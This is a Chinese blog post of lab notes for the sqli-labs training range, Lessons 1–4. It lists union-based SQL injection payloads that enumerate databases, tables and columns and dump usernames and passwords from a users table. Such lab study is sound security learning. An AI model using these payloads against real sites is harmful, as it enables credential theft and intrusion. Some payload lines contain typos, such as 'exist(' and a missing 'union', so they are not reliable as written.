sqli-labs靶场笔记（一）

最新推荐文章于 2024-08-14 21:05:20 发布

Vi_vids

最新推荐文章于 2024-08-14 21:05:20 发布

阅读量222

点赞数

分类专栏： SQL注入

本文链接：https://blog.csdn.net/Vi_vids/article/details/110307370

版权

SQL注入专栏收录该内容

10 篇文章 0 订阅

订阅专栏

sqli-labs靶场笔记（一）

Less-01【联合注入|'注入】

下面展示 payload。

id=-1' union select 1,user(),database() --+
id=-1' or exist(select * from information_schema_columns) --+
id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
id=-1' union select 1,2,group_concat(0x7e,username,0x7e,password) from security.users --+

判断是否存在注入点

在这里插入图片描述

存在注入点

确定属性列数目 | 回显属性

在这里插入图片描述

在这里插入图片描述
确定属性列为3

确定属性列回显2，3行

查找数据库名 | 用户名

在这里插入图片描述
确定数据库为security | 用户名为root@localhost

判断是否存在information_schema.columns | tables表

在这里插入图片描述
两表确定存在

查看security数据库下的表

在这里插入图片描述
确定表为emails、referers、uagents、users

查看某表中的属性列名

这里以users表为例
在这里插入图片描述
确定属性列为id、username、password

查看属性对应值

在这里插入图片描述

Less-02【联合注入】

下面展示 payload。

id=-1 union select 1,2,3
id=-1 union select 1,user(),database()
id=-1 or exist(select * from information_schema_columns)
id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
id=-1 union select 1,2,group_concat(0x7e,username,0x7e,password) from security.users

判断是否存在注入点!

在这里插入图片描述

存在注入点

确定属性列数目 | 回显属性

在这里插入图片描述

确定属性列为3
在这里插入图片描述

确定属性列回显2，3行

查找数据库名 | 用户名

在这里插入图片描述

确定数据库为security | 用户名为root@localhost

判断是否存在information_schema.columns | tables表

在这里插入图片描述

两表确定存在

查看security数据库下的表

在这里插入图片描述

确定表为emails、referers、uagents、users

查看某表中的属性列名

这里以users表为例
在这里插入图片描述

确定属性列为id、username、password

查看属性对应值

在这里插入图片描述

Less-03【联合注入|’)注入】

下面展示 payload。

id=1') and 1=2 --+
id=1') order by 3 --+
id=-1') select 1,2,3 --+
id=-1') or exists(select * from information_schema.columns) --+
id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
id=-1') union select 1,2,group_concat(0x7e,username,0x7e,password) from security.users --+

Less-04【联合注入|")注入】

下面展示 payload。

id=1") and 1=2 --+
id=1") order by 3 --+
id=-1") select 1,2,3 --+
id=-1") or exists(select * from information_schema.columns) --+
id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
id=-1") union select 1,2,group_concat(0x7e,username,0x7e,password) from security.users --+